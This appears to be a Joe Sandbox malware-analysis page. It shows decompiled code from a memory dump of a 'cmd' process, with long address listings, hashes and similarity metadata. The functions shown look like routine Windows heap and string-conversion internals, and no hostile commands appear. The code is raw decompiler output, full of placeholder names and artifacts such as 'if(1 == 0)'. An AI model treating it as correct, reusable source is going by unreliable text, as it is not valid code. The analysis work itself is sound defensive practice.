										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}

0x036febb8
0x036febbf
0x036febc1
0x036febc6
0x00000000
0x0373b6d6
0x036febcd
0x036febd2
0x036fec95
0x0373b6e0
0x036fec9b
0x036feca1
0x036feca1
0x036fec89
0x00000000
0x036fec89
0x036febd8
0x036febdd
0x0373b6ea
0x00000000
0x036febe3
0x036febe5
0x036febe7
0x036febef
0x036febf2
0x00000000
0x036febf5
0x00000000
0x036febf5
0x036febf5
0x036febf7
0x0373b6f6
0x036fec7c
0x036fec7c
0x036fec7f
0x036fec82
0x036fec87
0x00000000
0x036fec87
0x036fec1a
0x036fec1a
0x036fec25
0x0373b725
0x0373b72c
0x0373b72c
0x036fec2d
0x036fec31
0x0373b73c
0x0373b744
0x0373b748
0x0373b748
0x0373b749
0x0373b749
0x0373b74a
0x0373b74a
0x036fec3e
0x0373b860
0x00000000
0x036fec44
0x036fec47
0x0373b750
0x0373b758
0x0373b767
0x0373b775
0x0373b77c
0x0373b77f
0x0373b769
0x0373b76c
0x0373b76c
0x0373b781
0x0373b788
0x0373b78b
0x0373b75a
0x0373b75d
0x0373b75d
0x0373b78d
0x0373b792
0x0373b793
0x0373b793
0x036fec54
0x036fec56
0x036fec57
0x036fec59
0x036fec5e
0x036fecaa
0x036fed16
0x036fed16
0x036fecac
0x036fecaf
0x036fecb4
0x036fecb6
0x036fecb6
0x036fecb9
0x036fecbf
0x0373b7c1
0x0373b7c8
0x0373b7d3
0x0373b7db
0x0373b7ec
0x0373b858
0x00000000
0x0373b858
0x0373b7ee
0x0373b7f1
0x0373b7f4
0x0373b7ff
0x0373b850
0x00000000
0x0373b850
0x0373b80a
0x0373b813
0x0373b81c
0x0373b81d
0x0373b822
0x0373b825
0x0373b828
0x0373b831
0x0373b832
0x0373b837
0x0373b840
0x0373b842
0x0373b845
0x0373b848
0x00000000
0x0373b848
0x0373b7df
0x00000000
0x0373b7df
0x0373b7cc
0x00000000
0x0373b7cc
0x036fecc5
0x036fecc7
0x036feccb
0x0373b79b
0x0373b79e
0x0373b7a4
0x00000000
0x00000000
0x0373b7a6
0x0373b7a8
0x0373b7a8
0x036fecd3
0x00000000
0x00000000
0x00000000
0x00000000
0x036fecd5
0x036fecd5
0x036fecd5
0x036fecd8
0x036fecda
0x036fece4
0x00000000
0x00000000
0x036fecea
0x036feced
0x036fecf0
0x036fecf2
0x036fecfb
0x036fecfe
0x036fed01
0x036fed06
0x00000000
0x00000000
0x00000000
0x036fed06
0x0373b7ae
0x0373b7b1
0x0373b7b7
0x00000000
0x00000000
0x0373b7b9
0x0373b7bb
0x036fed08
0x036fed08
0x036fed0c
0x036fed0c
0x00000000
0x036fec60
0x036fec62
0x036fed0f
0x036fed0f
0x00000000
0x036fed0f
0x036fec68
0x036fec6c
0x036fec6f
0x036fec75
0x036fec0d
0x036fec0d
0x036fec18
0x00000000
0x00000000
0x00000000
0x036fec18
0x036fec77
0x036fec79
0x036fec79
0x00000000
0x036fec68
0x036fec5e
0x036fec3e
0x036febfd
0x036fec02
0x0373b701
0x0373b70c
0x0373b71b
0x0373b71d
0x0373b71d
0x00000000
0x0373b70c
0x036fec08
0x036fec0a
0x00000000
0x036fec0a
0x036febf5
0x036febf5

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction ID: b5c96e40b6e76ed73ada18093a1d8f817f423bc076aa1bb035176dd31441c5a0
Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction Fuzzy Hash: C0814A32A482568FEB21CE6CC4C12BDBF55EF53300B2C45BFEA528B752C226D946D791

Uniqueness

Uniqueness Score: -1.00%

Function 036EAB40 Relevance: .2, Instructions: 240
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E036EAB40(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed short _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr* _v28;
				intOrPtr _t69;
				intOrPtr* _t70;
				intOrPtr _t71;
				intOrPtr _t73;
				void* _t74;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t88;
				unsigned int _t97;
				unsigned int _t99;
				unsigned int _t105;
				unsigned int _t107;
				intOrPtr* _t111;
				unsigned int _t118;
				void* _t123;
				intOrPtr _t127;
				signed int _t128;
				void* _t131;
				signed char _t136;
				signed char _t141;
				signed char _t146;
				signed int _t151;
				signed int _t153;
				unsigned int _t155;
				intOrPtr _t158;
				void* _t164;
				signed short _t167;
				void* _t171;
				void* _t173;
				intOrPtr* _t175;
				intOrPtr* _t178;
				signed short _t180;
				signed short _t182;

				_t149 = __ecx;
				_t111 =  *((intOrPtr*)(__edx + 0x18));
				_v24 = __edx;
				_t69 =  *((intOrPtr*)(_t111 + 4));
				_t158 = _a12;
				_v8 = __ecx;
				_v16 = _a8 -  *((intOrPtr*)(__edx + 0x14));
				_v28 = _t111;
				if(_t111 == _t69) {
					L7:
					_t70 = _t111;
					goto L8;
				} else {
					_t127 = _a4;
					if(_t127 == 0) {
						_t171 = _t158 -  *((intOrPtr*)(_t69 + 0x14));
					} else {
						_t182 =  *(_t69 - 8);
						_v20 = _t69 + 0xfffffff8;
						if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
							_t105 =  *(__ecx + 0x50) ^ _t182;
							_v12 = _t105;
							_t107 = _v12;
							_t146 = _t105 >> 0x00000010 ^ _t105 >> 0x00000008 ^ _t107;
							if(_t107 >> 0x18 != _t146) {
								_push(_t146);
								E0378A80D(__ecx, _v20, 0, 0);
								_t149 = _v8;
							}
							_t182 = _v12;
							_t127 = _a4;
						}
						_t171 = _t158 - (_t182 & 0x0000ffff);
					}
					if(_t171 <= 0) {
						_t71 =  *_t111;
						if(_t127 == 0) {
							_t173 = _t158 -  *((intOrPtr*)(_t71 + 0x14));
						} else {
							_t180 =  *(_t71 - 8);
							_v20 = _t71 + 0xfffffff8;
							if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
								_t97 =  *(_t149 + 0x50) ^ _t180;
								_v12 = _t97;
								_t99 = _v12;
								_t141 = _t97 >> 0x00000010 ^ _t97 >> 0x00000008 ^ _t99;
								if(_t99 >> 0x18 != _t141) {
									_push(_t141);
									E0378A80D(_t149, _v20, 0, 0);
									_t149 = _v8;
								}
								_t180 = _v12;
								_t127 = _a4;
							}
							_t173 = _t158 - (_t180 & 0x0000ffff);
						}
						if(_t173 <= 0) {
							return  *_t111;
						} else {
							_t175 = _v24;
							if( *_t175 != 0 || _a8 !=  *((intOrPtr*)(_t175 + 4)) - 1) {
								_t128 = _v16;
								_t73 =  *((intOrPtr*)(_t175 + 0x1c));
								_t151 = _t128 >> 5;
								_t164 = ( *((intOrPtr*)(_t175 + 4)) -  *((intOrPtr*)(_t175 + 0x14)) >> 5) - 1;
								_t118 =  !((1 << (_t128 & 0x0000001f)) - 1) &  *(_t73 + _t151 * 4);
								_t74 = _t73 + _t151 * 4;
								if(1 == 0) {
									while(_t151 <= _t164) {
										_t118 =  *(_t74 + 4);
										_t74 = _t74 + 4;
										_t151 = _t151 + 1;
										if(_t118 == 0) {
											continue;
										} else {
											goto L28;
										}
										goto L51;
									}
									if(_t118 != 0) {
										goto L28;
									} else {
										goto L40;
									}
								} else {
									L28:
									if(_t118 == 0) {
										_t77 = _t118 >> 0x00000010 & 0x000000ff;
										if(_t77 != 0) {
											_t79 = ( *(_t77 + 0x36a84d0) & 0x000000ff) + 0x10;
										} else {
											_t57 = (_t118 >> 0x18) + 0x36a84d0; // 0x10008
											_t79 = ( *_t57 & 0x000000ff) + 0x18;
										}
									} else {
										_t82 = _t118 & 0x000000ff;
										if(_t118 == 0) {
											_t79 = ( *((_t118 >> 0x00000008 & 0x000000ff) + 0x36a84d0) & 0x000000ff) + 8;
										} else {
											_t79 =  *(_t82 + 0x36a84d0) & 0x000000ff;
										}
									}
									_t153 = (_t151 << 5) + _t79;
									if( *((intOrPtr*)(_t175 + 8)) != 0) {
										_t153 = _t153 + _t153;
									}
									_t70 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t153 * 4));
									L8:
									return _t70;
								}
							} else {
								_t88 = _v16;
								if( *((intOrPtr*)(_t175 + 8)) != 0) {
									_t88 = _t88 + _t88;
								}
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t88 * 4));
								if(_t111 == _t178) {
									L40:
									return 0;
								} else {
									do {
										if(_t127 == 0) {
											_t131 = _t158 -  *((intOrPtr*)(_t178 + 0x14));
										} else {
											_t167 =  *(_t178 - 8);
											_t123 = _t178 - 8;
											if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
												_t155 =  *(_t149 + 0x50) ^ _t167;
												_t167 = _t155;
												_t136 = _t155 >> 0x00000010 ^ _t155 >> 0x00000008 ^ _t155;
												_t149 = _v8;
												if(_t155 >> 0x18 != _t136) {
													_push(_t136);
													E0378A80D(_t149, _t123, 0, 0);
													_t149 = _v8;
												}
											}
											_t111 = _v28;
											_t158 = _a12;
											_t131 = _t158 - (_t167 & 0x0000ffff);
										}
										if(_t131 <= 0) {
											return _t178;
										} else {
											goto L24;
										}
										goto L51;
										L24:
										_t178 =  *_t178;
										_t127 = _a4;
									} while (_t111 != _t178);
									goto L40;
								}
							}
						}
					} else {
						goto L7;
					}
				}
				L51:
			}

0x036eab4a
0x036eab51
0x036eab57
0x036eab5b
0x036eab5e
0x036eab61
0x036eab64
0x036eab67
0x036eab6c
0x036eabbb
0x036eabbb
0x00000000
0x036eab6e
0x036eab6e
0x036eab73
0x036ead70
0x036eab79
0x036eab79
0x036eab83
0x036eab86
0x036eab8b
0x036eab8f
0x036eab9a
0x036eab9d
0x036eaba4
0x0373242c
0x03732439
0x0373243e
0x0373243e
0x036eabaa
0x036eabad
0x036eabad
0x036eabb5
0x036eabb5
0x036eabb9
0x036eabc6
0x036eabca
0x036ead7a
0x036eabd0
0x036eabd0
0x036eabda
0x036eabdd
0x036eabe2
0x036eabe6
0x036eabf1
0x036eabf4
0x036eabfb
0x03732446
0x03732453
0x03732458
0x03732458
0x036eac01
0x036eac04
0x036eac04
0x036eac0c
0x036eac0c
0x036eac10
0x036ead6b
0x036eac16
0x036eac16
0x036eac1c
0x036eaca7
0x036eacba
0x036eacbd
0x036eacc8
0x036eacc9
0x036eaccc
0x036eaccf
0x036ead00
0x036ead04
0x036ead07
0x036ead0a
0x036ead0d
0x00000000
0x036ead0f
0x00000000
0x036ead0f
0x00000000
0x036ead0d
0x036ead40
0x00000000
0x00000000
0x00000000
0x00000000
0x036eacd1
0x036eacd1
0x036eacd4
0x036ead16
0x036ead1b
0x036ead54
0x036ead1d
0x036ead20
0x036ead27
0x036ead27
0x036eacd6
0x036eacd6
0x036eacdb
0x036ead39
0x036eacdd
0x036eacdd
0x036eacdd
0x036eacdb
0x036eace7
0x036eaced
0x0373247f
0x0373247f
0x036eacf6
0x036eabbd
0x036eabc3
0x036eabc3
0x036eac2b
0x036eac2f
0x036eac32
0x03732460
0x03732460
0x036eac3b
0x036eac40
0x036ead42
0x036ead4a
0x036eac46
0x036eac46
0x036eac48
0x036ead5b
0x036eac4e
0x036eac4e
0x036eac51
0x036eac58
0x036eac5d
0x036eac66
0x036eac6d
0x036eac74
0x036eac77
0x03732467
0x03732472
0x03732477
0x03732477
0x036eac77
0x036eac7d
0x036eac83
0x036eac88
0x036eac88
0x036eac8c
0x036eaca4
0x00000000
0x00000000
0x00000000
0x00000000
0x036eac8e
0x036eac8e
0x036eac90
0x036eac93
0x00000000
0x036eac46
0x036eac40
0x036eac1c
0x00000000
0x00000000
0x00000000
0x036eabb9
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e5485a41b5c6663be2455c274e6049dbb0766a898b68b837b102dcd56474db7
Instruction ID: ec9abccf760f06ad8e13b15d14f4e3a496abbbed6ca35d65671fe4e9b57bcaee
Opcode Fuzzy Hash: 9e5485a41b5c6663be2455c274e6049dbb0766a898b68b837b102dcd56474db7
Instruction Fuzzy Hash: 1781D431A012298BDB24CF9DC99477EB7F1EF85311F194299D9819F381D630ED49CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 037925DD Relevance: .2, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E037925DD(intOrPtr __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, signed int _a12, char* _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				signed int _t74;
				signed int _t77;
				signed int _t80;
				signed int _t82;
				signed int _t102;
				signed int _t117;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t154;
				signed int _t160;
				signed int _t168;
				unsigned int _t175;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t193;
				signed int _t194;
				unsigned int _t200;
				unsigned int _t201;
				signed char _t202;
				signed int _t204;
				signed int _t210;
				intOrPtr _t211;
				signed int _t212;

				_t133 = _a4;
				_v24 = __edx;
				_v16 = __ecx;
				E03792E3F(__ecx, __edx, __eflags, _t133);
				_t204 = _a8;
				_t187 = 0x10;
				_t210 = (( *_t133 ^  *0x37b6110 ^ _t133) >> 0x00000001 & 0x00007fff) - _t204;
				if(_t210 != 0 && ( *(_v16 + 0x38) & 0x00000001) != 0) {
					_t185 = (_t133 + _t204 * 0x00000008 + 0x00000fff & 0xfffff000) - _t133 + _t204 * 8 >> 3;
					_t132 = _t185 << 3;
					if(_t132 >= _t187) {
						if(__eflags != 0) {
							__eflags = _t132 - 0x20;
							if(_t132 < 0x20) {
								_t204 = _t204 + 1;
								_t210 = _t210 - 1;
								__eflags = _t210;
							}
						}
					} else {
						_t204 = _t204 + _t185;
						_t210 = _t210 - _t185;
					}
				}
				if(_t210 << 3 < _t187) {
					_t204 = _t204 + _t210;
				}
				_t74 =  *0x37b6110; // 0x16cffc9d
				asm("sbb edx, edx");
				_t189 =  !_t187 & _t210;
				_t211 = _v24;
				_v20 = _t189;
				 *_t133 = ( !_t74 ^  *_t133 ^ _t133) & 0x7fffffff ^  !_t74 ^ _t133;
				_t152 = _t133 - _t211;
				_t77 = _t133 - _t211 >> 0xc;
				_v28 = _t77;
				_t80 = (_t77 ^  *0x37b6110 ^ _t133) & 0x000000ff;
				_v32 = _t80;
				 *(_t133 + 4) = _t80;
				_t82 = _t204 << 3;
				if(_t189 != 0) {
					_t82 = _t82 + 0x10;
				}
				_t190 = _t189 | 0xffffffff;
				_t154 = 0x3f;
				_v12 = E0370D340(_t82 + _t152 - 0x00000001 >> 0x0000000c | 0xffffffff, _t154 - (_t82 + _t152 - 1 >> 0xc), _t190);
				_v8 = _t190;
				_t191 = _t190 | 0xffffffff;
				_v12 = _v12 & E0370D0F0(_t86 | 0xffffffff, _v28, _t191);
				_v8 = _v8 & _t191;
				_t193 = _v12 & ( *(_t211 + 8) ^ _v12);
				_t212 = _v20;
				_t160 = _v8 & ( *(_t211 + 0xc) ^ _v8);
				_v12 = _t193;
				_v8 = _t160;
				if((_t193 | _t160) != 0) {
					 *(_t133 + 4) = _v32 | 0x00000200;
					_t117 = _a12 & 0x00000001;
					_v32 = _t117;
					if(_t117 == 0) {
						E036DFFB0(_t133, _t204, _v16);
						_t193 = _v12;
					}
					_t212 = _v20;
					_t200 =  !_v8;
					_t121 = _t200 & 0x000000ff;
					_t201 = _t200 >> 8;
					_t44 = _t121 + 0x36aac00; // 0x6070708
					_t122 = _t201 & 0x000000ff;
					_t202 = _t201 >> 8;
					_t175 = _t202 >> 8;
					_t45 = _t122 + 0x36aac00; // 0x6070708
					_t123 = _t202 & 0x000000ff;
					_t47 = _t175 + 0x36aac00; // 0x6060706
					_t48 = _t123 + 0x36aac00; // 0x6070708
					_t142 = _v16;
					if(E03792FBD(_v16, _v24, _v12, _v8, ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff) + ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff), 1) < 0) {
						_t212 = _t212 + _t204;
						_t204 = 0;
					}
					if(_v32 == 0) {
						E036E2280(_t125, _t142);
					}
					_t133 = _a4;
					 *_a16 = 0xff;
					 *(_t133 + 4) =  *(_t133 + 4) & 0xfffffdff;
				}
				 *_t133 =  *_t133 ^ (_t204 + _t204 ^  *_t133 ^  *0x37b6110 ^ _t133) & 0x0000fffe;
				if(_t212 != 0) {
					_t194 = _t133 + _t204 * 8;
					_t134 =  *0x37b6110; // 0x16cffc9d
					if(_t204 == 0) {
						_t102 = ( *_t194 ^ _t134 ^ _t194) & 0x7fff0000;
						__eflags = _t102;
					} else {
						_t102 = _t204 << 0x10;
					}
					_t135 = _v24;
					 *_t194 = ((_t212 & 0x00007fff | 0xc0000000) + (_t212 & 0x00007fff | 0xc0000000) | _t102) ^ _t134 ^ _t194;
					_t168 = _t194 + _t212 * 8;
					 *(_t194 + 4) = (_t194 - _t135 >> 0x0000000c ^  *0x37b6110 ^ _t194) & 0x000000ff;
					if(_t168 < _t135 + (( *(_t135 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t168 =  *_t168 ^ (_t212 << 0x00000010 ^  *_t168 ^  *0x37b6110 ^ _t168) & 0x7fff0000;
					}
					E0379241A(_v16, _t135, _t194, _a12, _a16);
				}
				return _t204;
			}

0x037925e6
0x037925f6
0x037925fb
0x037925fe
0x03792603
0x03792610
0x03792611
0x03792613
0x0379262f
0x03792634
0x03792639
0x03792641
0x03792643
0x03792646
0x03792648
0x03792649
0x03792649
0x03792649
0x03792646
0x0379263b
0x0379263b
0x0379263d
0x0379263d
0x03792639
0x03792651
0x03792653
0x03792655
0x03792657
0x0379265c
0x03792668
0x0379266a
0x03792675
0x0379267c
0x03792680
0x03792684
0x03792687
0x03792692
0x03792695
0x03792698
0x0379269d
0x037926a2
0x037926a4
0x037926a4
0x037926a8
0x037926b2
0x037926c0
0x037926c6
0x037926c9
0x037926d1
0x037926d4
0x037926e2
0x037926ea
0x037926ed
0x037926f1
0x037926f6
0x037926f9
0x03792707
0x0379270d
0x03792710
0x03792713
0x03792718
0x0379271d
0x0379271d
0x03792722
0x03792750
0x03792758
0x0379275d
0x03792760
0x03792766
0x03792769
0x0379276e
0x03792771
0x03792777
0x0379277d
0x03792783
0x03792791
0x037927a7
0x037927a9
0x037927ab
0x037927ab
0x037927b1
0x037927b4
0x037927b4
0x037927bc
0x037927bf
0x037927c2
0x037927c2
0x037927db
0x037927df
0x037927e5
0x037927e8
0x037927f0
0x037927ff
0x037927ff
0x037927f2
0x037927f4
0x037927f4
0x0379281a
0x03792824
0x03792826
0x03792834
0x03792843
0x03792858
0x03792858
0x03792866
0x03792866
0x03792873

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c81122eeb9553265e044bfa1f1c95f8a9f29313396ba1dad0061c9d5415ddc1c
Instruction ID: 26464f6f22163942d40c7ed8f2e791d72dd773dcd0b03fbe4bb303d396eff9da
Opcode Fuzzy Hash: c81122eeb9553265e044bfa1f1c95f8a9f29313396ba1dad0061c9d5415ddc1c
Instruction Fuzzy Hash: E8811772A101199FDF08DF79C8916BEB7F1FF88310B1986AAD856DB386DA349901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03791D55 Relevance: .2, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E03791D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x37a1070);
				E0371D08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E0379337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E037933B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E037096E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E037933B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E036FE18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x37b5880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
